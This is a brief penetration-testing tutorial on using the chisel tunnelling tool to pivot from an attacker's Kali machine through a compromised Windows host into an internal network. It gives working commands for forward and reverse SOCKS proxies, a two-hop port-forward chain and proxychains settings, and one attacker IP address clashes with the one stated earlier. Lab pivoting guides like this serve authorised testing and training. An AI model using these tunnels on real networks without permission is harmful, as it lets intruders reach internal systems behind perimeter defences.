chisel is a fast TCP/UDP tunnel based on HTTP.
Project address: https://github.com/jpillora/chisel/releases
Advantages: Uses SSH encryption for better security. It has a disconnect and reconnect mechanism for better stability (similar to ew, which disconnects after a long period of inactivity). Written in Go language, supports multiple platforms. Single file with no dependencies.
Attacker (kali): 192.168.6.131
Victim (windows): 192.168.6.129
Topology:
Attacker (192.168.6.131) < -- > Victim (192.168.6.129, 10.1.1.1) < -- > Internal Server (10.1.1.2)
Target Access: 10.1.1.2
Level 1 Proxy#
Forward connection (socks)
Jump server (victim)
./chisel server -p 12345
Attacker
./chisel client 192.168.6.129:12345 socks
The socks proxy is bound to port 1080, so you can access it by setting up a socks5 proxy locally.
Reverse connection
Attacker (hacker)
./chisel server -p 12345 --reverse --socks5
Jump server (victim)
chisel.exe client 192.168.6.128:12345 R:socks
The attacker (hacker) can access 10.1.1.2.
Level 2 Proxy#
Accessing specific ports#
kali:
chisel server -p 3333 --reverse
web01:
Open two terminals, run both client and server
chisel server -p 2222 --reverse
chisel client 192.168.126.132:3333 R:1111:127.0.0.1:5555
web02:
chisel client 192.168.150.128:2222 R:5555:192.168.59.129:80
Access 192.168.59.129:80 by visiting 127.0.0.1:1111 on kali.
Socks proxy#
kali:
chisel server -p 3333 --reverse
web01:
Open two terminals, run both client and server
chisel server -p 2222 --reverse --socks5
chisel client 192.168.126.132:3333 R:1111:socks
web02:
chisel client 192.168.150.128:2222 R:5555:socks
Configure proxy chain in proxychains.conf file
socks5 127.0.0.1 1111
socks5 127.0.0.1 5555
Reference: https://youtu.be/srUUUkcYEwg